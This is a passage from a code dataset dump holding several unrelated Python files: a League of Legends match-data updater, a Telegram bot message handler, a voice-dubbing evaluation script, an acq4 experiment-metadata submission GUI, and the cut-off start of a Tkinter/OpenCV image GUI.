LolParser.connection)\n\nfor row in new_data['match_id']: \n print(\"Updating match {}\".format(row))\n\n if old_data[old_data['match_id'] == row] is not None:\n json_dict = json.loads(new_data[new_data['match_id'] == row]['json_data'].values[0])\n\n teams = json_dict['teams']\n game_result = old_data[old_data['match_id'] == row]['win'].values[0]\n\n our_team = {}\n enemy_team = {}\n\n if teams[0]['win'] == game_result:\n our_team = teams[0]\n enemy_team = teams[1]\n else:\n our_team = teams[1]\n enemy_team = teams[0]\n\n enemy_dragon_kills = enemy_team['dragonKills']\n enemy_rift_herald_kills = enemy_team['riftHeraldKills']\n\n team_data_table_update = db.update(LolParser.team_data_table).values(\n enemy_dragon_kills=enemy_dragon_kills,\n enemy_rift_herald_kills=enemy_rift_herald_kills\n ).where(LolParser.team_data_table.c.match_id==row)\n\n results = LolParser.connection.execute(team_data_table_update)\n else:\n print(\"Hey, uh, {} isn't in our team_data table. Fix me sometime?\".format(row))\n continue\n\nexit()\n","repo_name":"Spaynkee/lol-data-py","sub_path":"resources/python/scripts/enemy_dragon_rift_herald_fill.py","file_name":"enemy_dragon_rift_herald_fill.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6336556529","text":"import json\n\nimport requests\n\nfrom util.constants import TOKEN, URL\n\nWEBHOOK_URL = f\"https://api.telegram.org/bot{TOKEN}/setWebhook?url={URL}\"\n\n\ndef parse_message(message):\n print(json.dumps(message, indent=2, sort_keys=True))\n chat_id = message['message']['chat']['id']\n txt = message['message']['text']\n print(f\"chat_id: {chat_id}\")\n print(f\"txt: {txt}\")\n return chat_id, txt\n\n\ndef send_message(chat_id, text):\n url = f'https://api.telegram.org/bot{TOKEN}/sendMessage'\n payload = {\n 'chat_id': chat_id,\n 'text': text\n }\n req = requests.post(url, json=payload)\n return req\n\n","repo_name":"tristobal/schedule-telegram-bot","sub_path":"telegram/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73909388572","text":"import argparse\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '3'\nfrom resemblyzer import VoiceEncoder\nimport torch\nimport yaml\nfrom torch.utils.data import DataLoader\n\nfrom utils.model import get_model, get_vocoder\nfrom utils.tools import to_device, synth_multi_samples\nfrom dataset import Dataset\n\nimport numpy as np\n\nfrom scipy.io.wavfile import write\nfrom tqdm import tqdm\nimport sys\nfrom mcd import Calculate_MCD\n\nsys.path.append(\"..\")\nfrom resemblyzer import preprocess_wav\n\n\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef acc_metric(speakers_ids, speakers_all, wav_reconstructions_utterance_embeds, \\\n wav_predictions_utterance_embeds, ids2loc_map, loc2ids_map, centroids=None):\n\n if centroids is None:\n # Inclusive centroids (1 per speaker) (speaker_num x embed_size)\n centroids_rec = np.zeros((len(speakers_ids), wav_reconstructions_utterance_embeds.shape[1]), dtype=np.float)\n # calculate the centroids for each speaker\n counters = np.zeros((len(speakers_ids),))\n for i in range(wav_reconstructions_utterance_embeds.shape[0]):\n # calculate centroids\n centroids_rec[ids2loc_map[speakers_all[i].item()]] += wav_reconstructions_utterance_embeds[i]\n counters[ids2loc_map[speakers_all[i].item()]] += 1\n # normalize\n for i in 
range(len(counters)):\n centroids_rec[i] = centroids_rec[i] / counters[i]\n centroids_rec[i] = centroids_rec[i] / (np.linalg.norm(centroids_rec[i], ord=2) + 1e-5)\n else:\n centroids_rec = centroids\n sim_matrix_pred = np.dot(wav_predictions_utterance_embeds, centroids_rec.T)\n sim_matrix_rec = np.dot(wav_reconstructions_utterance_embeds, centroids_rec.T)\n # pred_locs 512x1\n pred_locs = sim_matrix_pred.argmax(axis=1)\n rec_locs = sim_matrix_rec.argmax(axis=1)\n # calculate acc\n correct_num_pred = 0\n correct_num_rec = 0\n for i in range(len(pred_locs)):\n if loc2ids_map[pred_locs[i]]==speakers_all[i].item():\n correct_num_pred += 1\n if loc2ids_map[rec_locs[i]]==speakers_all[i].item():\n correct_num_rec += 1\n eval_acc_pred = correct_num_pred/float(len(pred_locs))\n eval_acc_rec = correct_num_rec/float(len(pred_locs))\n\n return eval_acc_rec, eval_acc_pred\n\n\ndef assess_all_spk_emo(encoder_spk, encoder_emo, sampling_rate, samples_path,\n mcd_box_plain, mcd_box_dtw, mcd_box_adv_dtw,\n wav_reconstructions_batch, wav_predictions_batch, tags_batch, speakers_batch, emotions_batch,\n cofs_batch):\n # how many speaker in here (value equal to the speaker id)\n speakers_ids = torch.unique(torch.tensor(speakers_batch, dtype=torch.long))\n emotions_ids = torch.unique(torch.tensor(emotions_batch, dtype=torch.long))\n\n # speakers mapping\n ids2loc_map = {}\n loc2ids_map = {}\n for i in range(len(speakers_ids)):\n ids2loc_map[speakers_ids[i].item()] = i\n loc2ids_map[i] = speakers_ids[i].item()\n # emotion mapping\n ids2loc_map_emo = {}\n loc2ids_map_emo = {}\n for i in range(len(emotions_ids)):\n ids2loc_map_emo[emotions_ids[i].item()] = i\n loc2ids_map_emo[i] = emotions_ids[i].item()\n\n # save and reload val (train) samples\n # save\n rec_fpaths = []\n pred_fpaths = []\n for i in range(len(wav_reconstructions_batch)):\n rec_fpath = os.path.join(samples_path, \"wav_rec_{}.wav\".format(tags_batch[i]))\n pred_fpath = os.path.join(samples_path, \"wav_pred_{}.wav\".format(tags_batch[i]))\n\n write(rec_fpath, sampling_rate, wav_reconstructions_batch[i])\n write(pred_fpath, sampling_rate, wav_predictions_batch[i])\n\n rec_fpaths.append(rec_fpath)\n pred_fpaths.append(pred_fpath)\n\n # reload\n print(\"Reloading ...\")\n rec_wavs = np.array(list(map(preprocess_wav, tqdm(rec_fpaths, \"Preprocessing rec wavs\", len(rec_fpaths)))))\n pred_wavs = np.array(list(map(preprocess_wav, tqdm(pred_fpaths, \"Preprocessing pred wavs\", len(pred_fpaths)))))\n # rec_wavs = np.array(list(map(preprocess_wav, (rec_fpaths, \"Preprocessing rec wavs\", len(rec_fpaths)))))\n # pred_wavs = np.array(list(map(preprocess_wav, (pred_fpaths, \"Preprocessing pred wavs\", len(pred_fpaths)))))\n\n # mcd\n print(\"calculate MCD ...\")\n for i in tqdm(range(len(rec_fpaths))):\n # for i in (range(len(rec_fpaths))):\n if i != (len(rec_fpaths) - 1):\n mcd_box_plain.calculate_mcd(rec_fpaths[i], pred_fpaths[i], len(rec_fpaths), average=False)\n mcd_box_dtw.calculate_mcd(rec_fpaths[i], pred_fpaths[i], len(rec_fpaths), average=False)\n mcd_box_adv_dtw.calculate_mcd(rec_fpaths[i], pred_fpaths[i], len(rec_fpaths), cofs_batch[i], average=False)\n else:\n avg_mcd_plain = mcd_box_plain.calculate_mcd(\n rec_fpaths[i], pred_fpaths[i], len(rec_fpaths), average=True)\n avg_mcd_dtw = mcd_box_dtw.calculate_mcd(\n rec_fpaths[i], pred_fpaths[i], len(rec_fpaths), average=True)\n avg_mcd_adv_dtw = mcd_box_adv_dtw.calculate_mcd(\n rec_fpaths[i], pred_fpaths[i], len(rec_fpaths), cofs_batch[i], average=True)\n\n # speaker and emotion: 
(speakers/emttion_per_batch x utterances_per_se) x embedding_dim\n # Compute the wav embedding for accuracy (spk)\n wav_reconstructions_utterance_embeds_spk = np.array(list(map(encoder_spk.embed_utterance, rec_wavs)))\n wav_predictions_utterance_embeds_spk = np.array(list(map(encoder_spk.embed_utterance, pred_wavs)))\n # Compute the wav embedding for accuracy (emo)\n wav_reconstructions_utterance_embeds_emo = np.array(list(map(encoder_emo.embed_utterance, rec_wavs)))\n wav_predictions_utterance_embeds_emo = np.array(list(map(encoder_emo.embed_utterance, pred_wavs)))\n\n # calcuate accuracy\n # emotion\n # centroids_emo = np.load(\"/mnt/cephfs/home/conggaoxiang/workspace/Project/Resemblyzer/centroids_emo_all.npy\")\n # centroids_emo = np.load(\"/home/conggaoxiang/Desktop/Avatar2/V2C/centroids_emo_all.npy\")\n eval_acc_rec_emo, eval_acc_pred_emo = acc_metric(emotions_ids, emotions_batch, \\\n wav_reconstructions_utterance_embeds_emo,\n wav_predictions_utterance_embeds_emo, \\\n ids2loc_map_emo, loc2ids_map_emo, centroids=None)\n # speaker\n eval_acc_rec_spk, eval_acc_pred_spk = acc_metric(speakers_ids, speakers_batch, \\\n wav_reconstructions_utterance_embeds_spk,\n wav_predictions_utterance_embeds_spk, \\\n ids2loc_map, loc2ids_map)\n\n acc_means_spk = [eval_acc_rec_spk, eval_acc_pred_spk]\n acc_means_emo = [eval_acc_rec_emo, eval_acc_pred_emo]\n avg_mcd = [avg_mcd_plain, avg_mcd_dtw, avg_mcd_adv_dtw]\n\n return acc_means_spk, acc_means_emo, avg_mcd\n\n\ndef calculate_all_acc(preprocess_config2, model_config, model, vocoder, \\\n encoder_spk, encoder_emo, loader, sampling_rate=None, samples_path=None, \\\n mcd_box_plain=None, mcd_box_dtw=None, mcd_box_adv_dtw=None, useGT=False):\n # Evaluation\n counter_batch = 0\n\n for batchs in tqdm(loader):\n wav_reconstructions_batch = []\n wav_predictions_batch = []\n tags_batch =[]\n speakers_batch = []\n emotions_batch = []\n cofs_batch = []\n counter_batch+=1\n for batch in batchs:\n batch = to_device(batch, device)\n with torch.no_grad():\n # Forward\n output = model(*(batch[2:]), useGT=useGT)\n\n # synthesize multiple sample for speaker and emotion accuracy calculation\n wav_reconstructions, wav_predictions, tags, speakers, emotions, cofs = synth_multi_samples(\n batch,\n output,\n vocoder,\n model_config,\n preprocess_config2,\n )\n # merge\n wav_reconstructions_batch.extend(wav_reconstructions)\n wav_predictions_batch.extend(wav_predictions)\n tags_batch.extend(tags)\n speakers_batch.extend(speakers)\n emotions_batch.extend(emotions)\n cofs_batch.extend(cofs)\n\n # calculate metrics\n os.makedirs(samples_path, exist_ok=True)\n acc_means_spk, acc_means_emo, avg_mcd = assess_all_spk_emo(\n encoder_spk=encoder_spk, encoder_emo=encoder_emo, sampling_rate=sampling_rate, samples_path=samples_path,\n mcd_box_plain=mcd_box_plain, mcd_box_dtw=mcd_box_dtw, mcd_box_adv_dtw=mcd_box_adv_dtw,\n wav_reconstructions_batch=wav_reconstructions_batch, wav_predictions_batch=wav_predictions_batch,\n tags_batch=tags_batch, speakers_batch=speakers_batch, emotions_batch=emotions_batch, cofs_batch=cofs_batch)\n if counter_batch == 1:\n acc_sums_spk = acc_means_spk\n acc_sums_emo = acc_means_emo\n sum_mcd = avg_mcd\n else:\n acc_sums_spk = list(map(lambda x: x[0] + x[1], zip(acc_sums_spk, acc_means_spk)))\n acc_sums_emo = list(map(lambda x: x[0] + x[1], zip(acc_sums_emo, acc_means_emo)))\n sum_mcd = list(map(lambda x: x[0] + x[1], zip(sum_mcd, avg_mcd)))\n\n acc_sums_spk = list(np.array(acc_sums_spk)/counter_batch)\n acc_sums_emo = 
list(np.array(acc_sums_emo)/counter_batch)\n sum_mcd = list(np.array(sum_mcd)/counter_batch)\n return batch, output, acc_sums_spk, acc_sums_emo, sum_mcd\n\n\ndef save_wav(sampling_rate, samples_path,\n wav_reconstructions_batch, wav_predictions_batch, tags_batch):\n rec_fpaths = []\n pred_fpaths = []\n for i in range(len(wav_reconstructions_batch)):\n generated_path = os.path.join(samples_path, \"generated_path\")\n reconstruct_path = os.path.join(samples_path, \"reconstruct_path\")\n os.makedirs(generated_path, exist_ok=True)\n os.makedirs(reconstruct_path, exist_ok=True)\n\n\n rec_fpath = os.path.join(reconstruct_path, \"wav_rec_{}.wav\".format(tags_batch[i]))\n pred_fpath = os.path.join(generated_path, \"wav_pred_{}.wav\".format(tags_batch[i]))\n\n write(rec_fpath, sampling_rate, wav_reconstructions_batch[i])\n write(pred_fpath, sampling_rate, wav_predictions_batch[i])\n\n rec_fpaths.append(rec_fpath)\n pred_fpaths.append(pred_fpath)\n\n\n\n\n\ndef evaluate_all_valset(model, step, configs, vocoder=None, encoder_spk=None, encoder_emo=None):\n preprocess_config, model_config, train_config, preprocess_config2 = configs\n useGT = False\n\n val_samples_path = train_config[\"path\"][\"result_path\"]\n sampling_rate = preprocess_config2[\"preprocessing\"][\"audio\"][\"sampling_rate\"]\n\n dataset_val = Dataset(\n \"val.txt\", preprocess_config2, train_config, sort=False, drop_last=False, diff_audio=True\n )\n\n loader_val = DataLoader(\n dataset_val,\n batch_size=32,\n shuffle=False,\n collate_fn=dataset_val.collate_fn,\n )\n\n print(\"Start load all val-set\", '\\n')\n print('The number of the val-set:', len(dataset_val), '\\n')\n # Get loss function\n # Loss = HPM_DubbingLoss(preprocess_config2, model_config).to(device)\n\n print(\"calculate all acc ...\")\n # initialize MCD module\n mcd_box_plain = Calculate_MCD(\"plain\", sr=sampling_rate)\n mcd_box_dtw = Calculate_MCD(\"dtw\", sr=sampling_rate)\n mcd_box_adv_dtw = Calculate_MCD(\"adv_dtw\", sr=sampling_rate)\n #\n _, _, acc_means_val_spk, acc_means_val_emo, avg_mcd_val = calculate_all_acc(preprocess_config2, \\\n model_config, model, vocoder,\n encoder_spk, encoder_emo,\n loader_val,\n sampling_rate=sampling_rate,\n samples_path=val_samples_path, \\\n mcd_box_plain=mcd_box_plain,\n mcd_box_dtw=mcd_box_dtw,\n mcd_box_adv_dtw=mcd_box_adv_dtw,\n useGT=useGT)\n\n message = \"Validation Step {}, \\\n MCD plain|dtw|adv_dtw (val): {:.4f}|{:.4f}|{:.4f}, \\\n Id. Acc (val) (rec|pred): {:.4f}|{:.4f}, \\\n Emo. 
Acc (val) (rec|pred): {:.4f}|{:.4f}\".format(step,\n avg_mcd_val[0], avg_mcd_val[1],\n avg_mcd_val[2], \\\n acc_means_val_spk[0],\n acc_means_val_spk[1], \\\n acc_means_val_emo[0],\n acc_means_val_emo[1]\n )\n\n return message\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--restore_step\", type=int, default=420000)\n parser.add_argument(\n \"-p\",\n \"--preprocess_config\",\n type=str,\n required=True,\n help=\"path to preprocess.yaml\",\n )\n parser.add_argument(\"-p2\", \"--preprocess_config2\", type=str,\n required=True, help=\"path to the second preprocess.yaml\",\n )\n parser.add_argument(\n \"-m\", \"--model_config\", type=str, required=True, help=\"path to model.yaml\"\n )\n parser.add_argument(\n \"-t\", \"--train_config\", type=str, required=True, help=\"path to train.yaml\"\n )\n args = parser.parse_args()\n\n # Read Config\n preprocess_config = yaml.load(\n open(args.preprocess_config, \"r\"), Loader=yaml.FullLoader\n )\n model_config = yaml.load(open(args.model_config, \"r\"), Loader=yaml.FullLoader)\n train_config = yaml.load(open(args.train_config, \"r\"), Loader=yaml.FullLoader)\n preprocess_config2 = yaml.load(\n open(args.preprocess_config2, \"r\"), Loader=yaml.FullLoader\n )\n configs = (preprocess_config, model_config, train_config, preprocess_config2)\n\n # Get model\n model = get_model(args, configs, device, train=False).to(device)\n\n # Load vocoder\n vocoder = get_vocoder(model_config, device)\n encoder_spk = VoiceEncoder().to(device)\n encoder_emo = VoiceEncoder().to(device)\n encoder_spk.eval()\n encoder_emo.eval()\n # val_samples_path = \"./output/result/MovieAnimation\"\n\n\n message = evaluate_all_valset(model, args.restore_step, configs,\n vocoder, encoder_spk, encoder_emo)\n\n print(\"Out put the result ...\")\n print(message)\n\n\n\n\n\n\n","repo_name":"GalaxyCong/HPMDubbing","sub_path":"Inference.py","file_name":"Inference.py","file_ext":"py","file_size_in_byte":15451,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"32"} +{"seq_id":"71522958811","text":"\"\"\"\nScript used to submit completed experiment to database.\n\"\"\"\n\nfrom datetime import datetime\n\nimport acq4.util.Canvas, acq4.util.DataManager\nimport pyqtgraph as pg\nfrom pyqtgraph.Qt import QtGui, QtCore\n\nfrom .. import metadata_submission, config\nfrom . 
import ui\n\n\nclass ExperimentSubmitUi(QtGui.QWidget):\n def __init__(self):\n self.path = None\n \n QtGui.QWidget.__init__(self)\n self.setWindowTitle(\"Experiment metadata QC\")\n \n self.layout = QtGui.QGridLayout()\n self.setLayout(self.layout)\n \n self.hsplit = QtGui.QSplitter(QtCore.Qt.Horizontal)\n self.layout.addWidget(self.hsplit, 0, 0)\n\n self.left_panel = QtGui.QWidget()\n self.left_layout = QtGui.QVBoxLayout()\n self.left_layout.setContentsMargins(0, 0, 0, 0)\n self.left_panel.setLayout(self.left_layout)\n self.hsplit.addWidget(self.left_panel)\n\n self.file_tree = FileTreeWidget(self)\n self.file_tree.itemSelectionChanged.connect(self.selection_changed)\n self.file_tree.itemDoubleClicked.connect(self.load_clicked)\n self.left_layout.addWidget(self.file_tree)\n \n self.ctrl_widget = QtGui.QWidget()\n self.ctrl_layout = QtGui.QGridLayout()\n self.ctrl_widget.setLayout(self.ctrl_layout)\n self.ctrl_layout.setContentsMargins(0, 0, 0, 0)\n self.left_layout.addWidget(self.ctrl_widget)\n \n row = self.ctrl_layout.rowCount()\n self.load_btn = QtGui.QPushButton('load files')\n self.load_btn.clicked.connect(self.load_clicked)\n self.ctrl_layout.addWidget(self.load_btn, row, 0)\n \n self.submit_btn = QtGui.QPushButton('submit...')\n self.submit_btn.clicked.connect(self.submit_clicked)\n self.submit_btn.setEnabled(False)\n self.ctrl_layout.addWidget(self.submit_btn, row, 1)\n\n self.vsplit = QtGui.QSplitter(QtCore.Qt.Vertical)\n self.hsplit.addWidget(self.vsplit)\n self.hsplit.setSizes([600, 700])\n \n self.canvas = acq4.util.Canvas.Canvas(allowTransforms=False)\n self.vsplit.addWidget(self.canvas)\n \n self.timeline = ui.ExperimentTimeline()\n self.vsplit.addWidget(self.timeline)\n self.vsplit.setSizes([300, 600])\n \n self.submit_window = SubmitWindow()\n \n def set_path(self, path):\n self.path = path\n if path.info().get('dirType', None) != 'Site':\n raise Exception(\"Requested path is not a site directory: %s\" % (path.name()))\n self.file_tree.set_path(path)\n self.timeline.load_site(path)\n self.canvas.clear()\n\n def load_clicked(self):\n sel = self.file_tree.selectedItems()\n for item in sel:\n fh = item.fh\n if isinstance(item, NwbTreeItem):\n self.timeline.load_nwb(fh)\n else:\n self.canvas.addFile(fh)\n\n def submit_clicked(self):\n sel = self.file_tree.selectedItems()[0]\n sub = sel.submission()\n self.submit_window.update_info(sub)\n self.submit_window.show()\n self.submit_window.activateWindow() \n\n def selection_changed(self):\n sel = self.file_tree.selectedItems()\n sub = len(sel) == 1 and sel[0].is_submittable\n self.submit_btn.setEnabled(sub)\n\n\nclass FileTreeWidget(pg.TreeWidget):\n def __init__(self, ui):\n pg.TreeWidget.__init__(self)\n self.ui = ui\n self.path = None\n self.setColumnCount(3)\n self.setHeaderLabels(['file', 'category', 'metadata'])\n self.setSelectionMode(self.ExtendedSelection)\n self.setDragDropMode(self.NoDragDrop)\n \n # attempts to retain background colors on selected items:\n #self.setAllColumnsShowFocus(False)\n #self.itemSelectionChanged.connect(self._selection_changed)\n #self.style_delegate = StyleDelegate(self)\n #self.setItemDelegateForColumn(1, self.style_delegate)\n\n def set_path(self, path):\n self.path = path\n self._reload_file_tree()\n \n def _reload_file_tree(self):\n self.clear()\n \n dh = self.path.parent()\n root = self.invisibleRootItem()\n self._fill_tree(dh, root)\n \n def _fill_tree(self, dh, root):\n self.items = {}\n for fname in dh.ls():\n fh = dh[fname]\n if fh.isDir() and fh is not self.path:\n # exclude 
everything outside the selected site\n continue\n item = self._make_item(fh)\n self.items[fh] = item\n if hasattr(item, 'type_selected'):\n item.type_selected.connect(self._item_type_selected)\n \n root.addChild(item)\n item.setExpanded(True)\n item.fh = fh\n if fh.isDir():\n self._fill_tree(fh, item)\n \n for i in range(3):\n self.resizeColumnToContents(i)\n \n def _make_item(self, fh):\n info = fh.info()\n objtyp = info.get('__object_type__')\n \n if fh.isDir():\n dirtyp = info.get('dirType', None)\n dtyps = {'Experiment': ExperimentTreeItem, 'Slice': SliceTreeItem, 'Site': SiteTreeItem}\n if dirtyp in dtyps:\n return dtyps[dirtyp](self.ui, fh)\n \n if objtyp in ['ImageFile', 'MetaArray']:\n return ImageTreeItem(self.ui, fh)\n \n elif fh.shortName().lower().endswith('.nwb'):\n return NwbTreeItem(self.ui, fh)\n \n elif fh.shortName().startswith('MultiPatch_'):\n return MPLogTreeItem(self.ui, fh)\n \n item = TypeSelectItem(self.ui, fh, ['ignore'], 'ignore')\n return item\n\n def _item_type_selected(self, item, typ):\n for item in self.selectedItems():\n item.set_type(typ)\n self.resizeColumnToContents(1)\n\n ###### attempts to retain background colors on selected items:\n #def _selection_changed(self):\n ## Only select first column\n #try:\n #self.blockSignals(True)\n #for i in self.selectionModel().selectedIndexes():\n #if i.column() != 0:\n #self.selectionModel().select(i, QtGui.QItemSelectionModel.Deselect)\n #finally:\n #self.blockSignals(False)\n\n #def mousePressEvent(self, ev):\n #if ev.button() == QtCore.Qt.RightButton:\n #print('press')\n #ev.accept()\n #else:\n #pg.TreeWidget.mousePressEvent(self, ev)\n\n #def mouseReleaseEvent(self, ev):\n #if ev.button() == QtCore.Qt.RightButton:\n #index = self.indexAt(ev.pos())\n #item, col = self.itemFromIndex(index)\n #print('release', item, col)\n #self._itemClicked(item, col)\n #else:\n #pg.TreeWidget.mouseReleaseEvent(self, ev)\n\n\n#class StyleDelegate(QtGui.QStyledItemDelegate):\n #def __init__(self, table):\n #QtGui.QStyledItemDelegate.__init__(self)\n #self.table = table\n \n #def paint(self, painter, option, index):\n ##print(index.row(), index.column())\n #QtGui.QStyledItemDelegate.paint(self, painter, option, index)\n\n\nclass ExperimentTreeItem(pg.TreeWidgetItem):\n def __init__(self, ui, fh):\n self.fh = fh\n pg.TreeWidgetItem.__init__(self, [fh.shortName()])\n\n\nclass SliceTreeItem(pg.TreeWidgetItem):\n def __init__(self, ui, fh):\n self.fh = fh\n self.is_submittable = False\n \n #in_db = database.slice_from_timestamp(datetime.fromtimestamp(fh.info()['__timestamp__']))\n #if len(in_db) == 0:\n #status = \"NOT SUBMITTED\"\n #else:\n #status = \"submitted\"\n pg.TreeWidgetItem.__init__(self, [fh.shortName(), ''])\n\n\nclass SiteTreeItem(pg.TreeWidgetItem):\n def __init__(self, ui, fh):\n self.fh = fh\n self.ui = ui\n self.is_submittable = True\n\n pg.TreeWidgetItem.__init__(self, [fh.shortName(), ''])\n \n def submission(self):\n pips = self.ui.timeline.save()\n files = self.list_files()\n \n return metadata_submission.ExperimentMetadataSubmission(\n site_dh=self.fh, \n files=files,\n pipettes=pips,\n )\n \n def list_files(self):\n \"\"\"Generate a structure describing all files associated with this \n experiment (site) and its parent slice.\n \"\"\"\n files = []\n slice_dir = self.fh.parent()\n slice_item = self.parent()\n if slice_item is None:\n slice_item = self.treeWidget().invisibleRootItem()\n \n for parent in [slice_item, self]:\n childs = [parent.child(i) for i in range(parent.childCount())]\n for item in childs:\n if 
not item.fh.isFile():\n continue\n typ = item.type()\n if typ == 'ignore':\n continue\n files.append({'path': item.fh.name(relativeTo=slice_dir), 'category': typ})\n return files\n \n\n\nclass TypeSelectItem(pg.TreeWidgetItem):\n \"\"\"TreeWidgetItem with a type selection menu in the second column.\n \"\"\"\n class Signals(QtCore.QObject):\n type_selected = QtCore.Signal(object, object)\n \n def __init__(self, ui, fh, types, current_type):\n self.is_submittable = False\n self.fh = fh\n self._sigprox = ImageTreeItem.Signals()\n self.type_selected = self._sigprox.type_selected\n self.types = types\n pg.TreeWidgetItem.__init__(self, [fh.shortName(), '', ''])\n\n self.menu = QtGui.QMenu()\n for typ in self.types:\n act = self.menu.addAction(typ, self._type_selected)\n \n self.set_type(current_type)\n\n def _type_selected(self):\n action = self.treeWidget().sender()\n text = str(action.text()).strip()\n self.set_type(text)\n self.type_selected.emit(self, text)\n \n def set_type(self, typ):\n self.setText(1, typ)\n if typ == 'ignore':\n self.setBackground(1, pg.mkColor(0.9))\n else:\n self.setBackground(1, pg.mkColor('w'))\n\n def type(self):\n return self.text(1)\n\n def itemClicked(self, col):\n if col != 1:\n return\n tw = self.treeWidget()\n x = tw.header().sectionPosition(col)\n y = tw.header().height() + tw.visualItemRect(self).bottom()\n self.menu.popup(tw.mapToGlobal(QtCore.QPoint(x, y)))\n return None\n \n\nclass NwbTreeItem(TypeSelectItem):\n def __init__(self, ui, fh):\n types = ['ignore', 'MIES physiology']\n if fh.parent().info().get('dirType') == 'Site':\n typ = 'MIES physiology'\n else:\n typ = 'ignore'\n TypeSelectItem.__init__(self, ui, fh, types, typ)\n \n\nclass MPLogTreeItem(TypeSelectItem):\n def __init__(self, ui, fh):\n types = ['ignore', 'Multipatch log']\n if fh.parent().info().get('dirType') == 'Site':\n typ = types[1]\n else:\n typ = 'ignore'\n TypeSelectItem.__init__(self, ui, fh, types, typ)\n \n\nclass ImageTreeItem(TypeSelectItem):\n def __init__(self, ui, fh):\n info = fh.info()\n obj = fh.info().get('objective', '')\n\n # Make initial guess on image type\n typ = 'ignore'\n ptype = fh.parent().info().get('dirType')\n if ptype == 'Site':\n typ = 'recording site'\n elif ptype == 'Slice':\n if obj.startswith('40x'):\n typ = 'slice quality stack'\n if obj.startswith('4x'):\n typ = 'slice anatomy'\n\n types = ['ignore', 'slice anatomy', 'slice quality stack', 'recording site']\n TypeSelectItem.__init__(self, ui, fh, types, typ)\n \n self.setText(2, obj)\n illumination = info.get('illumination', {})\n if illumination is not None:\n colors = list(illumination.keys())\n else:\n colors = []\n if len(colors) == 0:\n color = 'w'\n elif len(colors) > 1:\n color = 'y'\n else:\n color = {'infrared': (255, 230, 230), 'green': (230, 255, 230), 'blue': (230, 230, 255), 'uv': (255, 220, 255)}[colors[0]]\n self.setBackground(2, pg.mkColor(color))\n \n\nclass SubmitWindow(QtGui.QWidget):\n def __init__(self):\n QtGui.QWidget.__init__(self)\n self.resize(800, 800)\n \n self.layout = QtGui.QGridLayout()\n self.setLayout(self.layout)\n \n self.message_text = QtGui.QTextBrowser()\n self.message_text.setOpenExternalLinks(True)\n self.layout.addWidget(self.message_text, 0, 0)\n \n self.info_tree = pg.DataTreeWidget()\n self.info_tree.setColumnHidden(1, True)\n self.layout.addWidget(self.info_tree, 0, 1)\n \n self.submit_btn = QtGui.QPushButton('submit!')\n self.submit_btn.clicked.connect(self.submit)\n self.layout.addWidget(self.submit_btn, 1, 1)\n \n def update_info(self, submission):\n 
self.submission = submission\n errors, warnings = submission.check()\n messages = ''\n for name, msgs in [('errors', errors), ('warnings', warnings)]:\n if len(msgs) == 0:\n messages += \"No %s.\" % name\n else:\n messages += \"%s:\\n\" % name.capitalize()\n for msg in msgs:\n messages += \"  • \" + msg + \"\\n\"\n messages += \"
\\n\"\n \n self.message_text.setHtml(messages)\n \n summary = submission.summary()\n self.info_tree.setData(summary)\n \n def submit(self):\n if len(self.submission.check()[0]) > 0:\n raise Exception(\"Can't submit; experiment has errors.\")\n self.submission.submit()\n self.hide()\n \n \n\n\ndef submit(data):\n print(\"Submitting \", data)\n session = Session()\n \n\n\n \nif __name__ == '__main__':\n import sys\n app = pg.mkQApp()\n pg.dbg()\n \n path = acq4.util.DataManager.getDirHandle(sys.argv[1])\n ui = ExperimentSubmitUi()\n ui.resize(1600, 1000)\n ui.show()\n ui.set_path(path)\n \n if sys.flags.interactive == 0:\n app.exec_()\n","repo_name":"timjarsky/aisynphys","sub_path":"aisynphys/ui/submit_expt.py","file_name":"submit_expt.py","file_ext":"py","file_size_in_byte":14307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74173239451","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 7 22:51:42 2020\r\n\r\n@author: rajku\r\n\"\"\"\r\n\r\n\r\nimport tkinter;\r\nfrom tkinter import ttk;\r\nimport cv2\r\nimport numpy\r\nfrom PIL import Image, ImageTk\r\n\r\n'''\r\n\r\nGUI window template\r\n\r\n1)Control input image transformation window\r\nwill contain buttons to launch new windows showing \r\nbinary ,grayscale,and original\r\n\r\n2)Drawing control Window\r\n\r\nControl whether to show the convex hull , or the defects \r\n\r\n\r\n1) \r\nCreate a window using tkinter\r\ncreate 3 buttons\r\nuse grid() to align\r\nuse pack() \r\nCreate three command functions\r\n\r\n\r\n\r\n'''\r\n\r\n\r\n'''\r\nI am thinking of making a main window and then launching two \r\nwindows separately one at at time (maybe )\r\none to just make it black and white \r\nand other to add convex hull and dots.\r\n'''\r\n\r\n\r\n'''\r\nThis below class is to show binary transformation of captured image\r\n'''\r\n\r\nclass GUI_test:\r\n \r\n '''\r\n This below function is just to initialize stuff and start the main\r\n windows\r\n '''\r\n def __init__(self):\r\n #Some internal variables\r\n self.bin_flag=1\r\n self.set_bin_flag=cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU\r\n \r\n self.root=tkinter.Tk();\r\n self.frame=ttk.Frame(self.root,width=600,height=400).grid(columnspan=4,rowspan=4);\r\n #self.image_disp=tkinter.PhotoImage(\"test.png\")\r\n self.frame_2=ttk.Frame(self.root,width=300,height=200,relief=tkinter.RIDGE, borderwidth=2)\r\n self.Image_proc=None\r\n self.frame_2.grid(rowspan=3,columnspan=3)\r\n #Buttons for frame_2\r\n self.btn_Bin=ttk.Button(self.frame_2,text=\"Make Binary\")\r\n #self.btn_Bin=ttk.Button(self.frame_2,text=\"Add convex hull \")\r\n self.btn_switch=ttk.Button(self.frame_2,text=\"Switch Black and white\")\r\n \r\n #self.btn_Bin=ttk.Button(self.frame_2,text=\"Add center defects\")\r\n #bindings for frame_2\r\n self.btn_Bin.bind(\"\",self.binary)\r\n self.btn_Bin.grid(row=0,column=0)\r\n self.btn_switch.bind(\"\",self.Switch_bin)\r\n self.btn_switch.grid(row=1,column=0)\r\n self.cap=None\r\n 